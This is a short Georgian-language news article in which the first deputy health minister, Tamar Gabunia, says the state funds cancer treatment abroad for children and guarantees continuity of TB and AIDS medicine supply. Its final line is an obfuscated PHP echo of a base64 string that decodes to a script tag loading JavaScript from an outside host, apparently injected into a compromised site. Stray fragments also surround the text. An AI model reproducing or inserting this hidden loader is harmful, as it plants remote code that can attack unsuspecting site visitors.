celsiusi
ავერსი საქკაბელი

„სახელმწიფო არის იმ ინიციატივის მთავარი დამფინანსებელი და მამოძრავებელი, რომელიც ონკოლოგიური დიაგნოზის მქონე ბავშვების დაფინანსების კუთხით ხორციელდება. სწორედ, სამთავრობო ჩართულობის დონეზე მოხდა ამ პროგრამის დაგეგმვა და ეს ინიციატივა გრძელდება ძალიან მაღალი პოლიტიკური მხარდაჭერის პირობებში“, - განაცხადა ჯანდაცვის მინისტრის პირველმა მოადგილემ.

როგორც თამარ გაბუნიამ აღნიშნა, სახელმწიფო, პირველივე დღიდან იყო ონკოლოგიური დიაგნოზის მქონე ბავშვების საზღვარგარეთ მკურნალობის პროგრამის დაწყების გარანტი. მინისტრის მოადგილის განცხადებით, დღესაც, სწორედ სახელმწიფოა მისი გაგრძელებისა და ბავშვებისათვის, უცხოეთში, საჭირო სერვისებით უზრუნველყოფის გარანტი.

„გარდა ამისა, სრულად, სახელმწიფო პროგრამებით ხორციელდება ტუბერკულოზისა და შიდსის მედიკამენტების შესყიდვა. დიდი ხნის წინ მოხდა ტრანსფორმაცია - ეს იყო ერთ-ერთი პირობა, ტუბერკულოზისა და შიდსის პროგრამებში, თავად დონორის მხრიდან - სახელმწიფოს რაც შეიძლება სწრაფად აეღო მათ მართვაზე პასუხსიმგებლობა, უწყვეტობის რისკი რომ არ დამდგარიყო. სახელმწიფომ, უკვე აიღო ეს პასუხისმგებლობა, რამდენიმე წლის წინ, მათ შორის არასამთავრობო სექტორის დაფინანსებაზეც. დღეს, პრევენციული სერვისები, რომელსაც ბენეფიციარებს, შიდსისა და ტუბერკულოზის ნაწილში ვაწვდით, დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნულ ცენტრთან ხელშეკრულების პირობებში ფინანსდება. ამიტომ, უწყვეტობის დარღვევის რაიმე რისკი, არ არსებობს. აქაც, სახელმწიფო არის იმის გარანტი, რომ სერვისებისა და მედიკამენტების მიწოდების ნაწილში, უწყვეტობა იყოს ნამდვილად, აბსოლუტურად გარანტირებული“, - განაცხადა თამარ გაბუნიამ.

138
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");